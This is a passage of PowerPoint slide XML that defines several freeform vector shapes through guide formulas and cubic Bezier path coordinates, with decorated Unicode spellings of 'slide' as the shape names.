                    <a:pt x="6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šlîḍe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5320386" y="3167500"/>
              <a:ext cx="109067" cy="174508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 34"/>
                <a:gd name="T1" fmla="*/ 17 h 54"/>
                <a:gd name="T2" fmla="*/ 1 w 34"/>
                <a:gd name="T3" fmla="*/ 20 h 54"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 29 h 54"/>
                <a:gd name="T6" fmla="*/ 20 w 34"/>
                <a:gd name="T7" fmla="*/ 54 h 54"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 40 h 54"/>
                <a:gd name="T10" fmla="*/ 29 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 54"/>
                <a:gd name="T12" fmla="*/ 27 w 34"/>
                <a:gd name="T13" fmla="*/ 10 h 54"/>
                <a:gd name="T14" fmla="*/ 24 w 34"/>
                <a:gd name="T15" fmla="*/ 5 h 54"/>
                <a:gd name="T16" fmla="*/ 14 w 34"/>
                <a:gd name="T17" fmla="*/ 0 h 54"/>
                <a:gd name="T18" fmla="*/ 3 w 34"/>
                <a:gd name="T19" fmla="*/ 1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4">
                  <a:moveTo>
                    <a:pt x="3" y="17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1" y="25"/>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="44"/>
                    <a:pt x="6" y="54"/>
                    <a:pt x="20" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="54"/>
                    <a:pt x="34" y="47"/>
                    <a:pt x="34" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="34"/>
                    <a:pt x="32" y="20"/>
                    <a:pt x="29" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="13"/>
                    <a:pt x="28" y="12"/>
                    <a:pt x="27" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="8"/>
                    <a:pt x="25" y="8"/>
                    <a:pt x="24" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="3"/>
                    <a:pt x="18" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="0"/>
                    <a:pt x="3" y="9"/>
                    <a:pt x="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śľîḑê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8310194" y="3254754"/>
              <a:ext cx="77710" cy="145878"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 24"/>
                <a:gd name="T1" fmla="*/ 17 h 45"/>
                <a:gd name="T2" fmla="*/ 3 w 24"/>
                <a:gd name="T3" fmla="*/ 24 h 45"/>
                <a:gd name="T4" fmla="*/ 0 w 24"/>
                <a:gd name="T5" fmla="*/ 33 h 45"/>
                <a:gd name="T6" fmla="*/ 0 w 24"/>
                <a:gd name="T7" fmla="*/ 38 h 45"/>
                <a:gd name="T8" fmla="*/ 4 w 24"/>
                <a:gd name="T9" fmla="*/ 44 h 45"/>
                <a:gd name="T10" fmla="*/ 5 w 24"/>
                <a:gd name="T11" fmla="*/ 45 h 45"/>
                <a:gd name="T12" fmla="*/ 23 w 24"/>
                <a:gd name="T13" fmla="*/ 31 h 45"/>
                <a:gd name="T14" fmla="*/ 24 w 24"/>
                <a:gd name="T15" fmla="*/ 5 h 45"/>
                <a:gd name="T16" fmla="*/ 21 w 24"/>
                <a:gd name="T17" fmla="*/ 0 h 45"/>
                <a:gd name="T18" fmla="*/ 12 w 24"/>
                <a:gd name="T19" fmla="*/ 6 h 45"/>
                <a:gd name="T20" fmla="*/ 7 w 24"/>
                <a:gd name="T21" fmla="*/ 1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45">
                  <a:moveTo>
                    <a:pt x="7" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="19"/>
                    <a:pt x="5" y="20"/>
                    <a:pt x="3" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="27"/>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="33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1"/>
                    <a:pt x="3" y="40"/>
                    <a:pt x="4" y="44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18" y="44"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="23" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="11"/>
                    <a:pt x="24" y="12"/>
                    <a:pt x="24" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="3"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="12" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="11"/>
                    <a:pt x="7" y="10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ṧ1iḋé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7778491" y="3096606"/>
              <a:ext cx="444449" cy="414456"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 53 w 138"/>
                <a:gd name="T1" fmla="*/ 65 h 128"/>
                <a:gd name="T2" fmla="*/ 61 w 138"/>
                <a:gd name="T3" fmla="*/ 54 h 128"/>
                <a:gd name="T4" fmla="*/ 73 w 138"/>
                <a:gd name="T5" fmla="*/ 48 h 128"/>
                <a:gd name="T6" fmla="*/ 86 w 138"/>
                <a:gd name="T7" fmla="*/ 42 h 128"/>
                <a:gd name="T8" fmla="*/ 93 w 138"/>
                <a:gd name="T9" fmla="*/ 30 h 128"/>
                <a:gd name="T10" fmla="*/ 93 w 138"/>
                <a:gd name="T11" fmla="*/ 29 h 128"/>
                <a:gd name="T12" fmla="*/ 73 w 138"/>
                <a:gd name="T13" fmla="*/ 21 h 128"/>
                <a:gd name="T14" fmla="*/ 68 w 138"/>
                <a:gd name="T15" fmla="*/ 14 h 128"/>
                <a:gd name="T16" fmla="*/ 64 w 138"/>
                <a:gd name="T17" fmla="*/ 8 h 128"/>
                <a:gd name="T18" fmla="*/ 59 w 138"/>
                <a:gd name="T19" fmla="*/ 3 h 128"/>
                <a:gd name="T20" fmla="*/ 52 w 138"/>
                <a:gd name="T21" fmla="*/ 0 h 128"/>
                <a:gd name="T22" fmla="*/ 50 w 138"/>
                <a:gd name="T23" fmla="*/ 0 h 128"/>
                <a:gd name="T24" fmla="*/ 46 w 138"/>
                <a:gd name="T25" fmla="*/ 2 h 128"/>
                <a:gd name="T26" fmla="*/ 41 w 138"/>
                <a:gd name="T27" fmla="*/ 4 h 128"/>
                <a:gd name="T28" fmla="*/ 36 w 138"/>
                <a:gd name="T29" fmla="*/ 13 h 128"/>
                <a:gd name="T30" fmla="*/ 35 w 138"/>
                <a:gd name="T31" fmla="*/ 25 h 128"/>
                <a:gd name="T32" fmla="*/ 32 w 138"/>
                <a:gd name="T33" fmla="*/ 35 h 128"/>
                <a:gd name="T34" fmla="*/ 15 w 138"/>
                <a:gd name="T35" fmla="*/ 40 h 128"/>
                <a:gd name="T36" fmla="*/ 8 w 138"/>
                <a:gd name="T37" fmla="*/ 44 h 128"/>
                <a:gd name="T38" fmla="*/ 5 w 138"/>
                <a:gd name="T39" fmla="*/ 51 h 128"/>
                <a:gd name="T40" fmla="*/ 29 w 138"/>
                <a:gd name="T41" fmla="*/ 69 h 128"/>
                <a:gd name="T42" fmla="*/ 29 w 138"/>
                <a:gd name="T43" fmla="*/ 70 h 128"/>
                <a:gd name="T44" fmla="*/ 16 w 138"/>
                <a:gd name="T45" fmla="*/ 94 h 128"/>
                <a:gd name="T46" fmla="*/ 2 w 138"/>
                <a:gd name="T47" fmla="*/ 110 h 128"/>
                <a:gd name="T48" fmla="*/ 0 w 138"/>
                <a:gd name="T49" fmla="*/ 121 h 128"/>
                <a:gd name="T50" fmla="*/ 3 w 138"/>
                <a:gd name="T51" fmla="*/ 123 h 128"/>
                <a:gd name="T52" fmla="*/ 18 w 138"/>
                <a:gd name="T53" fmla="*/ 116 h 128"/>
                <a:gd name="T54" fmla="*/ 28 w 138"/>
                <a:gd name="T55" fmla="*/ 106 h 128"/>
                <a:gd name="T56" fmla="*/ 46 w 138"/>
                <a:gd name="T57" fmla="*/ 83 h 128"/>
                <a:gd name="T58" fmla="*/ 49 w 138"/>
                <a:gd name="T59" fmla="*/ 83 h 128"/>
                <a:gd name="T60" fmla="*/ 64 w 138"/>
                <a:gd name="T61" fmla="*/ 96 h 128"/>
                <a:gd name="T62" fmla="*/ 74 w 138"/>
                <a:gd name="T63" fmla="*/ 111 h 128"/>
                <a:gd name="T64" fmla="*/ 89 w 138"/>
                <a:gd name="T65" fmla="*/ 123 h 128"/>
                <a:gd name="T66" fmla="*/ 110 w 138"/>
                <a:gd name="T67" fmla="*/ 128 h 128"/>
                <a:gd name="T68" fmla="*/ 138 w 138"/>
                <a:gd name="T69" fmla="*/ 121 h 128"/>
                <a:gd name="T70" fmla="*/ 138 w 138"/>
                <a:gd name="T71" fmla="*/ 120 h 128"/>
                <a:gd name="T72" fmla="*/ 127 w 138"/>
                <a:gd name="T73" fmla="*/ 112 h 128"/>
                <a:gd name="T74" fmla="*/ 126 w 138"/>
                <a:gd name="T75" fmla="*/ 113 h 128"/>
                <a:gd name="T76" fmla="*/ 120 w 138"/>
                <a:gd name="T77" fmla="*/ 110 h 128"/>
                <a:gd name="T78" fmla="*/ 108 w 138"/>
                <a:gd name="T79" fmla="*/ 104 h 128"/>
                <a:gd name="T80" fmla="*/ 97 w 138"/>
                <a:gd name="T81" fmla="*/ 98 h 128"/>
                <a:gd name="T82" fmla="*/ 79 w 138"/>
                <a:gd name="T83" fmla="*/ 83 h 128"/>
                <a:gd name="T84" fmla="*/ 75 w 138"/>
                <a:gd name="T85" fmla="*/ 80 h 128"/>
                <a:gd name="T86" fmla="*/ 75 w 138"/>
                <a:gd name="T87" fmla="*/ 80 h 128"/>
                <a:gd name="T88" fmla="*/ 64 w 138"/>
                <a:gd name="T89" fmla="*/ 72 h 128"/>
                <a:gd name="T90" fmla="*/ 53 w 138"/>
                <a:gd name="T91" fmla="*/ 6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8" h="128">
                  <a:moveTo>
                    <a:pt x="53" y="65"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="57"/>
                    <a:pt x="53" y="60"/>
                    <a:pt x="61" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="52"/>
                    <a:pt x="69" y="49"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="47"/>
                    <a:pt x="84" y="43"/>
                    <a:pt x="86" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="40"/>
                    <a:pt x="93" y="33"/>
                    <a:pt x="93" y="30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93" y="22"/>
                    <a:pt x="80" y="21"/>
                    <a:pt x="73" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="18"/>
                    <a:pt x="70" y="18"/>
                    <a:pt x="68" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="11"/>
                    <a:pt x="67" y="11"/>
                    <a:pt x="64" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="6"/>
                    <a:pt x="62" y="4"/>
                    <a:pt x="59" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="2"/>
                    <a:pt x="52" y="0"/>
                    <a:pt x="5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8" y="0"/>
                    <a:pt x="48" y="1"/>
                    <a:pt x="46" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="3"/>
                    <a:pt x="42" y="3"/>
                    <a:pt x="41" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="4"/>
                    <a:pt x="36" y="12"/>
                    <a:pt x="36" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="16"/>
                    <a:pt x="35" y="21"/>
                    <a:pt x="35" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="36"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="32" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="36"/>
                    <a:pt x="21" y="38"/>
                    <a:pt x="15" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="41"/>
                    <a:pt x="12" y="41"/>
                    <a:pt x="8" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="45"/>
                    <a:pt x="5" y="47"/>
                    <a:pt x="5" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="69"/>
                    <a:pt x="29" y="60"/>
                    <a:pt x="29" y="69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9" y="77"/>
                    <a:pt x="17" y="88"/>
                    <a:pt x="16" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="97"/>
                    <a:pt x="6" y="110"/>
                    <a:pt x="2" y="11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1" y="122"/>
                    <a:pt x="1" y="123"/>
                    <a:pt x="3" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="123"/>
                    <a:pt x="17" y="117"/>
                    <a:pt x="18" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="114"/>
                    <a:pt x="26" y="109"/>
                    <a:pt x="28" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="103"/>
                    <a:pt x="43" y="83"/>
                    <a:pt x="46" y="83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5" y="83"/>
                    <a:pt x="61" y="92"/>
                    <a:pt x="64" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="99"/>
                    <a:pt x="71" y="110"/>
                    <a:pt x="74" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="115"/>
                    <a:pt x="83" y="121"/>
                    <a:pt x="89" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="126"/>
                    <a:pt x="99" y="128"/>
                    <a:pt x="110" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="128"/>
                    <a:pt x="133" y="124"/>
                    <a:pt x="138" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="120"/>
                    <a:pt x="138" y="120"/>
                    <a:pt x="138" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="112"/>
                    <a:pt x="127" y="112"/>
                    <a:pt x="127" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="113"/>
                    <a:pt x="126" y="113"/>
                    <a:pt x="126" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="110"/>
                    <a:pt x="123" y="110"/>
                    <a:pt x="120" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="103"/>
                    <a:pt x="112" y="108"/>
                    <a:pt x="108" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="103"/>
                    <a:pt x="100" y="98"/>
                    <a:pt x="97" y="98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4" y="76"/>
                    <a:pt x="68" y="73"/>
                    <a:pt x="64" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="68"/>
                    <a:pt x="58" y="69"/>
                    <a:pt x="5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í$ḻïďé"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7306775" y="2999809"/>
              <a:ext cx="316295" cy="546700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 98"/>
                <a:gd name="T1" fmla="*/ 157 h 169"/>
                <a:gd name="T2" fmla="*/ 5 w 98"/>
                <a:gd name="T3" fmla="*/ 158 h 169"/>
                <a:gd name="T4" fmla="*/ 21 w 98"/>
                <a:gd name="T5" fmla="*/ 145 h 169"/>
                <a:gd name="T6" fmla="*/ 19 w 98"/>
                <a:gd name="T7" fmla="*/ 147 h 169"/>
                <a:gd name="T8" fmla="*/ 21 w 98"/>
                <a:gd name="T9" fmla="*/ 145 h 169"/>
                <a:gd name="T10" fmla="*/ 41 w 98"/>
                <a:gd name="T11" fmla="*/ 99 h 169"/>
                <a:gd name="T12" fmla="*/ 37 w 98"/>
                <a:gd name="T13" fmla="*/ 104 h 169"/>
                <a:gd name="T14" fmla="*/ 35 w 98"/>
                <a:gd name="T15" fmla="*/ 98 h 169"/>
                <a:gd name="T16" fmla="*/ 2 w 98"/>
                <a:gd name="T17" fmla="*/ 157 h 169"/>
                <a:gd name="T18" fmla="*/ 0 w 98"/>
                <a:gd name="T19" fmla="*/ 167 h 169"/>
                <a:gd name="T20" fmla="*/ 4 w 98"/>
                <a:gd name="T21" fmla="*/ 169 h 169"/>
                <a:gd name="T22" fmla="*/ 51 w 98"/>
                <a:gd name="T23" fmla="*/ 136 h 169"/>
                <a:gd name="T24" fmla="*/ 87 w 98"/>
                <a:gd name="T25" fmla="*/ 163 h 169"/>
                <a:gd name="T26" fmla="*/ 95 w 98"/>
                <a:gd name="T27" fmla="*/ 147 h 169"/>
                <a:gd name="T28" fmla="*/ 72 w 98"/>
                <a:gd name="T29" fmla="*/ 130 h 169"/>
                <a:gd name="T30" fmla="*/ 64 w 98"/>
                <a:gd name="T31" fmla="*/ 113 h 169"/>
                <a:gd name="T32" fmla="*/ 86 w 98"/>
                <a:gd name="T33" fmla="*/ 101 h 169"/>
                <a:gd name="T34" fmla="*/ 92 w 98"/>
                <a:gd name="T35" fmla="*/ 88 h 169"/>
                <a:gd name="T36" fmla="*/ 69 w 98"/>
                <a:gd name="T37" fmla="*/ 96 h 169"/>
                <a:gd name="T38" fmla="*/ 67 w 98"/>
                <a:gd name="T39" fmla="*/ 92 h 169"/>
                <a:gd name="T40" fmla="*/ 68 w 98"/>
                <a:gd name="T41" fmla="*/ 73 h 169"/>
                <a:gd name="T42" fmla="*/ 73 w 98"/>
                <a:gd name="T43" fmla="*/ 56 h 169"/>
                <a:gd name="T44" fmla="*/ 61 w 98"/>
                <a:gd name="T45" fmla="*/ 45 h 169"/>
                <a:gd name="T46" fmla="*/ 94 w 98"/>
                <a:gd name="T47" fmla="*/ 17 h 169"/>
                <a:gd name="T48" fmla="*/ 71 w 98"/>
                <a:gd name="T49" fmla="*/ 18 h 169"/>
                <a:gd name="T50" fmla="*/ 51 w 98"/>
                <a:gd name="T51" fmla="*/ 29 h 169"/>
                <a:gd name="T52" fmla="*/ 49 w 98"/>
                <a:gd name="T53" fmla="*/ 0 h 169"/>
                <a:gd name="T54" fmla="*/ 32 w 98"/>
                <a:gd name="T55" fmla="*/ 18 h 169"/>
                <a:gd name="T56" fmla="*/ 25 w 98"/>
                <a:gd name="T57" fmla="*/ 41 h 169"/>
                <a:gd name="T58" fmla="*/ 31 w 98"/>
                <a:gd name="T59" fmla="*/ 49 h 169"/>
                <a:gd name="T60" fmla="*/ 50 w 98"/>
                <a:gd name="T61" fmla="*/ 44 h 169"/>
                <a:gd name="T62" fmla="*/ 33 w 98"/>
                <a:gd name="T63" fmla="*/ 62 h 169"/>
                <a:gd name="T64" fmla="*/ 32 w 98"/>
                <a:gd name="T65" fmla="*/ 90 h 169"/>
                <a:gd name="T66" fmla="*/ 28 w 98"/>
                <a:gd name="T67" fmla="*/ 95 h 169"/>
                <a:gd name="T68" fmla="*/ 25 w 98"/>
                <a:gd name="T69" fmla="*/ 90 h 169"/>
                <a:gd name="T70" fmla="*/ 14 w 98"/>
                <a:gd name="T71" fmla="*/ 118 h 169"/>
                <a:gd name="T72" fmla="*/ 39 w 98"/>
                <a:gd name="T73" fmla="*/ 119 h 169"/>
                <a:gd name="T74" fmla="*/ 43 w 98"/>
                <a:gd name="T75" fmla="*/ 125 h 169"/>
                <a:gd name="T76" fmla="*/ 26 w 98"/>
                <a:gd name="T77" fmla="*/ 138 h 169"/>
                <a:gd name="T78" fmla="*/ 20 w 98"/>
                <a:gd name="T79" fmla="*/ 136 h 169"/>
                <a:gd name="T80" fmla="*/ 17 w 98"/>
                <a:gd name="T81" fmla="*/ 131 h 169"/>
                <a:gd name="T82" fmla="*/ 13 w 98"/>
                <a:gd name="T83" fmla="*/ 14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8" h="169">
                  <a:moveTo>
                    <a:pt x="5" y="157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="157"/>
                    <a:pt x="6" y="157"/>
                    <a:pt x="6" y="157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5" y="158"/>
                    <a:pt x="5" y="158"/>
                    <a:pt x="5" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="157"/>
                    <a:pt x="5" y="157"/>
                    <a:pt x="5" y="157"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="21" y="145"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="147"/>
                    <a:pt x="22" y="147"/>
                    <a:pt x="22" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="147"/>
                    <a:pt x="19" y="147"/>
                    <a:pt x="19" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="146"/>
                    <a:pt x="19" y="146"/>
                    <a:pt x="19" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="145"/>
                    <a:pt x="21" y="145"/>
                    <a:pt x="21" y="145"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="98"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="98"/>
                    <a:pt x="41" y="96"/>
                    <a:pt x="41" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="101"/>
                    <a:pt x="41" y="101"/>
                    <a:pt x="41" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="104"/>
                    <a:pt x="39" y="103"/>
                    <a:pt x="37" y="104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5" y="98"/>
                    <a:pt x="35" y="98"/>
                    <a:pt x="35" y="98"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5" y="157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="157"/>
                    <a:pt x="2" y="157"/>
                    <a:pt x="2" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="157"/>
                    <a:pt x="0" y="162"/>
                    <a:pt x="0" y="163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8"/>
                    <a:pt x="0" y="169"/>
                    <a:pt x="2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9" y="169"/>
                    <a:pt x="28" y="158"/>
                    <a:pt x="32" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="150"/>
                    <a:pt x="46" y="139"/>
                    <a:pt x="51" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="138"/>
                    <a:pt x="71" y="163"/>
                    <a:pt x="85" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="163"/>
                    <a:pt x="87" y="163"/>
                    <a:pt x="87" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="163"/>
                    <a:pt x="93" y="153"/>
                    <a:pt x="98" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="147"/>
                    <a:pt x="95" y="147"/>
                    <a:pt x="95" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="144"/>
                    <a:pt x="84" y="136"/>
                    <a:pt x="79" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="132"/>
                    <a:pt x="76" y="133"/>
                    <a:pt x="72" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="130"/>
                    <a:pt x="61" y="129"/>
                    <a:pt x="59" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="119"/>
                    <a:pt x="60" y="119"/>
                    <a:pt x="64" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="107"/>
                    <a:pt x="69" y="109"/>
                    <a:pt x="74" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="104"/>
                    <a:pt x="81" y="104"/>
                    <a:pt x="86" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="99"/>
                    <a:pt x="92" y="96"/>
                    <a:pt x="96" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="92"/>
                    <a:pt x="95" y="89"/>
                    <a:pt x="92" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="88"/>
                    <a:pt x="85" y="88"/>
                    <a:pt x="82" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="87"/>
                    <a:pt x="73" y="94"/>
                    <a:pt x="69" y="96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62" y="77"/>
                    <a:pt x="64" y="77"/>
                    <a:pt x="68" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="70"/>
                    <a:pt x="77" y="66"/>
                    <a:pt x="77" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="60"/>
                    <a:pt x="74" y="56"/>
                    <a:pt x="73" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="56"/>
                    <a:pt x="53" y="64"/>
                    <a:pt x="53" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="55"/>
                    <a:pt x="59" y="48"/>
                    <a:pt x="61" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="41"/>
                    <a:pt x="68" y="38"/>
                    <a:pt x="72" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="33"/>
                    <a:pt x="94" y="20"/>
                    <a:pt x="94" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="12"/>
                    <a:pt x="87" y="13"/>
                    <a:pt x="83" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="14"/>
                    <a:pt x="76" y="16"/>
                    <a:pt x="71" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="19"/>
                    <a:pt x="57" y="28"/>
                    <a:pt x="55" y="32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3" y="24"/>
                    <a:pt x="63" y="17"/>
                    <a:pt x="63" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="6"/>
                    <a:pt x="54" y="0"/>
                    <a:pt x="4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0" y="0"/>
                    <a:pt x="33" y="10"/>
                    <a:pt x="32" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="20"/>
                    <a:pt x="25" y="31"/>
                    <a:pt x="25" y="38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4"/>
                    <a:pt x="26" y="49"/>
                    <a:pt x="28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42" y="43"/>
                    <a:pt x="43" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="42"/>
                    <a:pt x="50" y="40"/>
                    <a:pt x="50" y="44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6" y="48"/>
                    <a:pt x="35" y="58"/>
                    <a:pt x="33" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="81"/>
                    <a:pt x="34" y="73"/>
                    <a:pt x="37" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="86"/>
                    <a:pt x="32" y="88"/>
                    <a:pt x="32" y="90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29" y="92"/>
                    <a:pt x="29" y="92"/>
                    <a:pt x="28" y="95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4" y="102"/>
                    <a:pt x="14" y="108"/>
                    <a:pt x="14" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="121"/>
                    <a:pt x="16" y="122"/>
                    <a:pt x="17" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="122"/>
                    <a:pt x="34" y="119"/>
                    <a:pt x="39" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="119"/>
                    <a:pt x="43" y="120"/>
                    <a:pt x="44" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="125"/>
                    <a:pt x="43" y="125"/>
                    <a:pt x="43" y="125"/>
